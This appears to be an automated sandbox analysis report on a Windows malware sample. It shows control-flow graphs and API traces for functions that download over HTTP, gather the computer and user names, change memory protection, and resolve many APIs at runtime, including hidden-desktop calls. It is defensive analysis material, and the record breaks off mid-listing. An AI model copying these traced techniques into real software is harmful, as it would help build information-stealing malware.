                              control_flow_graph 2234 e36c40-e36c64 call e32930 2237 e36c66-e36c6b 2234->2237 2238 e36c75-e36c97 call e34bc0 2234->2238 2237->2238 2239 e36c6d-e36c6f lstrcpy 2237->2239 2242 e36caa-e36cba call e32930 2238->2242 2243 e36c99 2238->2243 2239->2238 2247 e36cc8-e36cf5 InternetOpenA StrCmpCA 2242->2247 2248 e36cbc-e36cc2 lstrcpy 2242->2248 2244 e36ca0-e36ca8 2243->2244 2244->2242 2244->2244 2249 e36cf7 2247->2249 2250 e36cfa-e36cfc 2247->2250 2248->2247 2249->2250 2251 e36d02-e36d22 InternetConnectA 2250->2251 2252 e36ea8-e36ebb call e32930 2250->2252 2253 e36ea1-e36ea2 InternetCloseHandle 2251->2253 2254 e36d28-e36d5d HttpOpenRequestA 2251->2254 2261 e36ec9-e36ee0 call e32a20 * 2 2252->2261 2262 e36ebd-e36ebf 2252->2262 2253->2252 2256 e36d63-e36d65 2254->2256 2257 e36e94-e36e9e InternetCloseHandle 2254->2257 2259 e36d67-e36d77 InternetSetOptionA 2256->2259 2260 e36d7d-e36dad HttpSendRequestA HttpQueryInfoA 2256->2260 2257->2253 2259->2260 2264 e36dd4-e36de4 call e53d90 2260->2264 2265 e36daf-e36dd3 call e571e0 call e32a20 * 2 2260->2265 2262->2261 2266 e36ec1-e36ec3 lstrcpy 2262->2266 2264->2265 2275 e36de6-e36de8 2264->2275 2266->2261 2277 e36dee-e36e07 InternetReadFile 2275->2277 2278 e36e8d-e36e8e InternetCloseHandle 2275->2278 2277->2278 2280 e36e0d 2277->2280 2278->2257 2282 e36e10-e36e15 2280->2282 2282->2278 2283 e36e17-e36e3d call e57310 2282->2283 2286 e36e44-e36e51 call e32930 2283->2286 2287 e36e3f call e32a20 2283->2287 2291 e36e53-e36e57 2286->2291 2292 e36e61-e36e8b call e32a20 InternetReadFile 2286->2292 2287->2286 2291->2292 2293 e36e59-e36e5b lstrcpy 2291->2293 2292->2278 2292->2282 2293->2292
                              APIs
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E36C6F
                              • lstrcpy.KERNEL32(00000000,00E5CFEC), ref: 00E36CC2
                              • InternetOpenA.WININET(00E5CFEC,00000001,00000000,00000000,00000000), ref: 00E36CD5
                              • StrCmpCA.SHLWAPI(?,00D2FAE0), ref: 00E36CED
                              • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00E36D15
                              • HttpOpenRequestA.WININET(00000000,GET,?,00D2F470,00000000,00000000,-00400100,00000000), ref: 00E36D50
                              • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00E36D77
                              • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00E36D86
                              • HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00E36DA5
                              • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00E36DFF
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E36E5B
                              • InternetReadFile.WININET(?,00000000,000007CF,?), ref: 00E36E7D
                              • InternetCloseHandle.WININET(00000000), ref: 00E36E8E
                              • InternetCloseHandle.WININET(?), ref: 00E36E98
                              • InternetCloseHandle.WININET(00000000), ref: 00E36EA2
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E36EC3
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                              • Associated: 00000000.00000002.2264990775.0000000000E30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000E67000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EDF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000001068000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265451745.000000000107A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.00000000012DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001303000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000130C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000131B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265873467.000000000131C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266017833.00000000014B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266043003.00000000014B4000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$lstrcpy$CloseHandleHttp$FileOpenReadRequest$ConnectInfoOptionQuerySend
                              • String ID: ERROR$GET
                              • API String ID: 3687753495-3591763792
                              • Opcode ID: 3c761d191057caba395aaa3958102bc33055a7aeaa0bf600e5b31d61a55c4511
                              • Instruction ID: 25ab098b58ed35be0554aa69bd442a54700c07432ebbe47e5f8eb4a503eee5cc
                              • Opcode Fuzzy Hash: 3c761d191057caba395aaa3958102bc33055a7aeaa0bf600e5b31d61a55c4511
                              • Instruction Fuzzy Hash: 6C818071A40315AFEB20DFA5DC49BAE7BB8AF44704F149458FA45FB280DB75AE04CB90
                              Function 00E34A60 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 119memoryCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 2850 e34a60-e34afc RtlAllocateHeap 2867 e34b7a-e34bbe VirtualProtect 2850->2867 2868 e34afe-e34b03 2850->2868 2869 e34b06-e34b78 2868->2869 2869->2867
                              APIs
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00E34AA3
                              • VirtualProtect.KERNEL32(00000000,00000004,00000100,?), ref: 00E34BB0
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                              • Associated: 00000000.00000002.2264990775.0000000000E30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000E67000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EDF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000001068000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265451745.000000000107A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.00000000012DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001303000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000130C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000131B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265873467.000000000131C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266017833.00000000014B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266043003.00000000014B4000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: AllocateHeapProtectVirtual
                              • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                              • API String ID: 1542196881-3329630956
                              • Opcode ID: 8dd841505d40ddda2b229e7e7935bd69d45b41a7eae2a09d4e4eb43131f91598
                              • Instruction ID: 6e87889eb4ec0c0905ea804b521c235a1fb848cda31dca26437a6440a85e6601
                              • Opcode Fuzzy Hash: 8dd841505d40ddda2b229e7e7935bd69d45b41a7eae2a09d4e4eb43131f91598
                              • Instruction Fuzzy Hash: A6312898BC032E768628EBFF6C47F5F6E55DFC57E0B01A0567428731C1C9A15401CBA2
                              Function 00E52AD0 Relevance: 4.5, APIs: 3, Instructions: 44memoryCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 2957 e52ad0-e52b22 GetProcessHeap RtlAllocateHeap GetComputerNameA 2958 e52b44-e52b59 2957->2958 2959 e52b24-e52b36 2957->2959
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 00E52AFF
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00E52B06
                              • GetComputerNameA.KERNEL32(00000000,00000104), ref: 00E52B1A
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                              • Associated: 00000000.00000002.2264990775.0000000000E30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000E67000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EDF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000001068000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265451745.000000000107A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.00000000012DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001303000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000130C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000131B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265873467.000000000131C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266017833.00000000014B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266043003.00000000014B4000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateComputerNameProcess
                              • String ID:
                              • API String ID: 1664310425-0
                              • Opcode ID: 2aa3aca4207626e53a31065305aa306b3fa32f8250748ef8178f5afa6903817d
                              • Instruction ID: 946873f01d640c8e1c06675eea01937283769148a1032b2527b9877ef7834339
                              • Opcode Fuzzy Hash: 2aa3aca4207626e53a31065305aa306b3fa32f8250748ef8178f5afa6903817d
                              • Instruction Fuzzy Hash: BE01D672A44208AFDB10CF99ED45B9DF7B8F745B25F00026AFD15E3780D779190487A1
                              Function 00E52A40 Relevance: 4.5, APIs: 3, Instructions: 33memoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 00E52A6F
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00E52A76
                              • GetUserNameA.ADVAPI32(00000000,00000104), ref: 00E52A8A
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                              • Associated: 00000000.00000002.2264990775.0000000000E30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000E67000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EDF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000001068000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265451745.000000000107A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.00000000012DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001303000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000130C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000131B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265873467.000000000131C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266017833.00000000014B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266043003.00000000014B4000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateNameProcessUser
                              • String ID:
                              • API String ID: 1296208442-0
                              • Opcode ID: e3962b151b0e3151508231d3fdd1f75fe12fddde542bf22472ab6e82511249a0
                              • Instruction ID: b74a1b8c36fef62284fd66f6130c0c549ac3654e0f6949a2e92ee0b0e3e6c5e0
                              • Opcode Fuzzy Hash: e3962b151b0e3151508231d3fdd1f75fe12fddde542bf22472ab6e82511249a0
                              • Instruction Fuzzy Hash: B4F090B1A40204AFD710DB88DD49B9EBBBCF704B25F000226FA15E3680D7B9190487A1
                              Function 00E566E0 Relevance: 210.7, APIs: 115, Strings: 5, Instructions: 696libraryloaderCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 633 e566e0-e566e7 634 e566ed-e56af9 GetProcAddress * 43 633->634 635 e56afe-e56b92 LoadLibraryA * 8 633->635 634->635 636 e56b94-e56c03 GetProcAddress * 5 635->636 637 e56c08-e56c0f 635->637 636->637 638 e56c15-e56ccd GetProcAddress * 8 637->638 639 e56cd2-e56cd9 637->639 638->639 640 e56d4f-e56d56 639->640 641 e56cdb-e56d4a GetProcAddress * 5 639->641 642 e56d5c-e56de4 GetProcAddress * 6 640->642 643 e56de9-e56df0 640->643 641->640 642->643 644 e56df6-e56f0b GetProcAddress * 12 643->644 645 e56f10-e56f17 643->645 644->645 646 e56f8d-e56f94 645->646 647 e56f19-e56f88 GetProcAddress * 5 645->647 648 e56f96-e56fbc GetProcAddress * 2 646->648 649 e56fc1-e56fc8 646->649 647->646 648->649 650 e56ff5-e56ffc 649->650 651 e56fca-e56ff0 GetProcAddress * 2 649->651 652 e57002-e570e8 GetProcAddress * 10 650->652 653 e570ed-e570f4 650->653 651->650 652->653 654 e570f6-e5714d GetProcAddress * 4 653->654 655 e57152-e57159 653->655 654->655 656 e5716e-e57175 655->656 657 e5715b-e57169 GetProcAddress 655->657 658 e57177-e571ce GetProcAddress * 4 656->658 659 e571d3 656->659 657->656 658->659
                              APIs
                              • GetProcAddress.KERNEL32(76210000,00D16960), ref: 00E566F5
                              • GetProcAddress.KERNEL32(76210000,00D167E0), ref: 00E5670D
                              • GetProcAddress.KERNEL32(76210000,00D290B0), ref: 00E56726
                              • GetProcAddress.KERNEL32(76210000,00D29038), ref: 00E5673E
                              • GetProcAddress.KERNEL32(76210000,00D29050), ref: 00E56756
                              • GetProcAddress.KERNEL32(76210000,00D2DA60), ref: 00E5676F
                              • GetProcAddress.KERNEL32(76210000,00D1A898), ref: 00E56787
                              • GetProcAddress.KERNEL32(76210000,00D2DBB0), ref: 00E5679F
                              • GetProcAddress.KERNEL32(76210000,00D2DA78), ref: 00E567B8
                              • GetProcAddress.KERNEL32(76210000,00D2D910), ref: 00E567D0
                              • GetProcAddress.KERNEL32(76210000,00D2DB20), ref: 00E567E8
                              • GetProcAddress.KERNEL32(76210000,00D16800), ref: 00E56801
                              • GetProcAddress.KERNEL32(76210000,00D169E0), ref: 00E56819
                              • GetProcAddress.KERNEL32(76210000,00D16820), ref: 00E56831
                              • GetProcAddress.KERNEL32(76210000,00D168C0), ref: 00E5684A
                              • GetProcAddress.KERNEL32(76210000,00D2DBC8), ref: 00E56862
                              • GetProcAddress.KERNEL32(76210000,00D2D9D0), ref: 00E5687A
                              • GetProcAddress.KERNEL32(76210000,00D1A6B8), ref: 00E56893
                              • GetProcAddress.KERNEL32(76210000,00D16A00), ref: 00E568AB
                              • GetProcAddress.KERNEL32(76210000,00D2DAA8), ref: 00E568C3
                              • GetProcAddress.KERNEL32(76210000,00D2DBE0), ref: 00E568DC
                              • GetProcAddress.KERNEL32(76210000,00D2DA90), ref: 00E568F4
                              • GetProcAddress.KERNEL32(76210000,00D2DAD8), ref: 00E5690C
                              • GetProcAddress.KERNEL32(76210000,00D168E0), ref: 00E56925
                              • GetProcAddress.KERNEL32(76210000,00D2DBF8), ref: 00E5693D
                              • GetProcAddress.KERNEL32(76210000,00D2DA00), ref: 00E56955
                              • GetProcAddress.KERNEL32(76210000,00D2DAC0), ref: 00E5696E
                              • GetProcAddress.KERNEL32(76210000,00D2D970), ref: 00E56986
                              • GetProcAddress.KERNEL32(76210000,00D2D988), ref: 00E5699E
                              • GetProcAddress.KERNEL32(76210000,00D2DA18), ref: 00E569B7
                              • GetProcAddress.KERNEL32(76210000,00D2D928), ref: 00E569CF
                              • GetProcAddress.KERNEL32(76210000,00D2D940), ref: 00E569E7
                              • GetProcAddress.KERNEL32(76210000,00D2DAF0), ref: 00E56A00
                              • GetProcAddress.KERNEL32(76210000,00D1FDB8), ref: 00E56A18
                              • GetProcAddress.KERNEL32(76210000,00D2D9E8), ref: 00E56A30
                              • GetProcAddress.KERNEL32(76210000,00D2DA30), ref: 00E56A49
                              • GetProcAddress.KERNEL32(76210000,00D16900), ref: 00E56A61
                              • GetProcAddress.KERNEL32(76210000,00D2D958), ref: 00E56A79
                              • GetProcAddress.KERNEL32(76210000,00D16940), ref: 00E56A92
                              • GetProcAddress.KERNEL32(76210000,00D2D9A0), ref: 00E56AAA
                              • GetProcAddress.KERNEL32(76210000,00D2DA48), ref: 00E56AC2
                              • GetProcAddress.KERNEL32(76210000,00D16A40), ref: 00E56ADB
                              • GetProcAddress.KERNEL32(76210000,00D16A80), ref: 00E56AF3
                              • LoadLibraryA.KERNEL32(00D2DB08,00E5051F), ref: 00E56B05
                              • LoadLibraryA.KERNEL32(00D2DB38), ref: 00E56B16
                              • LoadLibraryA.KERNEL32(00D2D9B8), ref: 00E56B28
                              • LoadLibraryA.KERNEL32(00D2DB50), ref: 00E56B3A
                              • LoadLibraryA.KERNEL32(00D2DB68), ref: 00E56B4B
                              • LoadLibraryA.KERNEL32(00D2DB80), ref: 00E56B5D
                              • LoadLibraryA.KERNEL32(00D2DB98), ref: 00E56B6F
                              • LoadLibraryA.KERNEL32(00D2DD90), ref: 00E56B80
                              • GetProcAddress.KERNEL32(751E0000,00D163A0), ref: 00E56B9C
                              • GetProcAddress.KERNEL32(751E0000,00D2DEE0), ref: 00E56BB4
                              • GetProcAddress.KERNEL32(751E0000,00D28A88), ref: 00E56BCD
                              • GetProcAddress.KERNEL32(751E0000,00D2DD48), ref: 00E56BE5
                              • GetProcAddress.KERNEL32(751E0000,00D164A0), ref: 00E56BFD
                              • GetProcAddress.KERNEL32(700F0000,00D1A910), ref: 00E56C1D
                              • GetProcAddress.KERNEL32(700F0000,00D16300), ref: 00E56C35
                              • GetProcAddress.KERNEL32(700F0000,00D1A550), ref: 00E56C4E
                              • GetProcAddress.KERNEL32(700F0000,00D2DDD8), ref: 00E56C66
                              • GetProcAddress.KERNEL32(700F0000,00D2DDF0), ref: 00E56C7E
                              • GetProcAddress.KERNEL32(700F0000,00D16320), ref: 00E56C97
                              • GetProcAddress.KERNEL32(700F0000,00D166C0), ref: 00E56CAF
                              • GetProcAddress.KERNEL32(700F0000,00D2DCD0), ref: 00E56CC7
                              • GetProcAddress.KERNEL32(753A0000,00D16480), ref: 00E56CE3
                              • GetProcAddress.KERNEL32(753A0000,00D165C0), ref: 00E56CFB
                              • GetProcAddress.KERNEL32(753A0000,00D2DD78), ref: 00E56D14
                              • GetProcAddress.KERNEL32(753A0000,00D2DE08), ref: 00E56D2C
                              • GetProcAddress.KERNEL32(753A0000,00D164C0), ref: 00E56D44
                              • GetProcAddress.KERNEL32(76310000,00D1A460), ref: 00E56D64
                              • GetProcAddress.KERNEL32(76310000,00D1A488), ref: 00E56D7C
                              • GetProcAddress.KERNEL32(76310000,00D2DDA8), ref: 00E56D95
                              • GetProcAddress.KERNEL32(76310000,00D16520), ref: 00E56DAD
                              • GetProcAddress.KERNEL32(76310000,00D16360), ref: 00E56DC5
                              • GetProcAddress.KERNEL32(76310000,00D1A8C0), ref: 00E56DDE
                              • GetProcAddress.KERNEL32(76910000,00D2DDC0), ref: 00E56DFE
                              • GetProcAddress.KERNEL32(76910000,00D162E0), ref: 00E56E16
                              • GetProcAddress.KERNEL32(76910000,00D28A98), ref: 00E56E2F
                              • GetProcAddress.KERNEL32(76910000,00D2DEF8), ref: 00E56E47
                              • GetProcAddress.KERNEL32(76910000,00D2DD18), ref: 00E56E5F
                              • GetProcAddress.KERNEL32(76910000,00D16380), ref: 00E56E78
                              • GetProcAddress.KERNEL32(76910000,00D16440), ref: 00E56E90
                              • GetProcAddress.KERNEL32(76910000,00D2DCB8), ref: 00E56EA8
                              • GetProcAddress.KERNEL32(76910000,00D2DD60), ref: 00E56EC1
                              • GetProcAddress.KERNEL32(76910000,CreateDesktopA), ref: 00E56ED7
                              • GetProcAddress.KERNEL32(76910000,OpenDesktopA), ref: 00E56EEE
                              • GetProcAddress.KERNEL32(76910000,CloseDesktop), ref: 00E56F05
                              • GetProcAddress.KERNEL32(75B30000,00D165A0), ref: 00E56F21
                              • GetProcAddress.KERNEL32(75B30000,00D2DC28), ref: 00E56F39
                              • GetProcAddress.KERNEL32(75B30000,00D2DC10), ref: 00E56F52
                              • GetProcAddress.KERNEL32(75B30000,00D2DE20), ref: 00E56F6A
                              • GetProcAddress.KERNEL32(75B30000,00D2DD30), ref: 00E56F82
                              • GetProcAddress.KERNEL32(75670000,00D16600), ref: 00E56F9E
                              • GetProcAddress.KERNEL32(75670000,00D165E0), ref: 00E56FB6
                              • GetProcAddress.KERNEL32(76AC0000,00D166A0), ref: 00E56FD2
                              • GetProcAddress.KERNEL32(76AC0000,00D2DC40), ref: 00E56FEA
                              • GetProcAddress.KERNEL32(6F4E0000,00D16540), ref: 00E5700A
                              • GetProcAddress.KERNEL32(6F4E0000,00D16500), ref: 00E57022
                              • GetProcAddress.KERNEL32(6F4E0000,00D163C0), ref: 00E5703B
                              • GetProcAddress.KERNEL32(6F4E0000,00D2DE38), ref: 00E57053
                              • GetProcAddress.KERNEL32(6F4E0000,00D163E0), ref: 00E5706B
                              • GetProcAddress.KERNEL32(6F4E0000,00D16620), ref: 00E57084
                              • GetProcAddress.KERNEL32(6F4E0000,00D16420), ref: 00E5709C
                              • GetProcAddress.KERNEL32(6F4E0000,00D16580), ref: 00E570B4
                              • GetProcAddress.KERNEL32(6F4E0000,InternetSetOptionA), ref: 00E570CB
                              • GetProcAddress.KERNEL32(6F4E0000,HttpQueryInfoA), ref: 00E570E2
                              • GetProcAddress.KERNEL32(75AE0000,00D2DE50), ref: 00E570FE
                              • GetProcAddress.KERNEL32(75AE0000,00D28928), ref: 00E57116
                              • GetProcAddress.KERNEL32(75AE0000,00D2DE68), ref: 00E5712F
                              • GetProcAddress.KERNEL32(75AE0000,00D2DC58), ref: 00E57147
                              • GetProcAddress.KERNEL32(76300000,00D164E0), ref: 00E57163
                              • GetProcAddress.KERNEL32(6D3F0000,00D2DE80), ref: 00E5717F
                              • GetProcAddress.KERNEL32(6D3F0000,00D16400), ref: 00E57197
                              • GetProcAddress.KERNEL32(6D3F0000,00D2DCE8), ref: 00E571B0
                              • GetProcAddress.KERNEL32(6D3F0000,00D2DE98), ref: 00E571C8
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                              • Associated: 00000000.00000002.2264990775.0000000000E30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000E67000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EDF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000001068000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265451745.000000000107A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.00000000012DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001303000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000130C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000131B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265873467.000000000131C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266017833.00000000014B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266043003.00000000014B4000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: AddressProc$LibraryLoad
                              • String ID: CloseDesktop$CreateDesktopA$HttpQueryInfoA$InternetSetOptionA$OpenDesktopA
                              • API String ID: 2238633743-3468015613
                              • Opcode ID: 698cee688fd7587cee6f6d788fc83881b4210ca8f90707bc74d2917b8f506946
                              • Instruction ID: ed903b5c8dbbe9d42d01bda9da1e8d79ad632f383e6e0146e507d563f2d9aa1a
                              • Opcode Fuzzy Hash: 698cee688fd7587cee6f6d788fc83881b4210ca8f90707bc74d2917b8f506946
                              • Instruction Fuzzy Hash: 086243B55143009FE774DFA4E898A2637B9F788309310891AFAD5C3B6CDB3E9850DB60
                              Function 00E4F1B0 Relevance: 102.7, APIs: 57, Strings: 1, Instructions: 1156stringCOMMON
                              Download Yara Rule
                              APIs
                              • lstrlen.KERNEL32(00E5CFEC), ref: 00E4F1D5
                              • lstrcpy.KERNEL32(00000000,00E5CFEC), ref: 00E4F1F1
                              • lstrlen.KERNEL32(00E5CFEC), ref: 00E4F1FC
                              • lstrcpy.KERNEL32(00000000,00E5CFEC), ref: 00E4F215
                              • lstrlen.KERNEL32(00E5CFEC), ref: 00E4F220
                              • lstrcpy.KERNEL32(00000000,00E5CFEC), ref: 00E4F239
                              • lstrcpy.KERNEL32(00000000,00E64FA0), ref: 00E4F25E
                              • lstrcpy.KERNEL32(00000000,00E5CFEC), ref: 00E4F28C
                              • lstrcpy.KERNEL32(00000000,00E5CFEC), ref: 00E4F2C0
                              • lstrcpy.KERNEL32(00000000,00E5CFEC), ref: 00E4F2F0
                              • lstrlen.KERNEL32(00D16980), ref: 00E4F315
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                              • Associated: 00000000.00000002.2264990775.0000000000E30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000E67000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EBE000.00000040.00000001.01000000.00000003.sdmpDownload File
